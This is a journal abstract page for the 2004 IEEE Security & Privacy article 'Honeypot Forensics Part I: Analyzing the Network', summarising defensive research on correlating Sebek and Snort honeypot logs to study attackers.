This Article 
   
 Share 
   
 Bibliographic References 
   
 Add to: 
 
Digg
Furl
Spurl
Blink
Simpy
Google
Del.icio.us
Y!MyWeb
 
 Search 
   
Honeypot Forensics Part I: Analyzing the Network
July-August 2004 (vol. 2 no. 4)
pp. 72-78
Frederic Raynal, MISC Magazine
Yann Berthier, Herv? Schauer Consultant
Philippe Biondi, Arche/Omnetica Group
Danielle Kaminsky, TEGAM International
A major goal of honeypot research is to improve our knowledge of blackhats from two perspectives: technical and ethnological. For the former, we want new ways to discover rootkits, trojans, and potential zero-day exploits (although capturing zero-day exploits in a honeypot is an unusual event). For the latter, we want a better understanding of the areas of interest and hidden links between blackhat teams. One way to achieve these goals is to increase the verbosity of our honeypot logs and traces; the most common tools for doing this are Sebek (http://project.honeynet.org/tools/sebek/) for system events and Snort (www.snort.org) for network activity. Unfortunately, there is no easy way to correlate information from these sources, which complicates honeypot forensics.
Index Terms:
honeynets, honeypots, blackhat
Citation:
Frederic Raynal, Yann Berthier, Philippe Biondi, Danielle Kaminsky, "Honeypot Forensics Part I: Analyzing the Network," IEEE Security & Privacy, vol. 2, no. 4, pp. 72-78, July-Aug. 2004, doi:10.1109/MSP.2004.47
Usage of this product signifies your acceptance of the Terms of Use.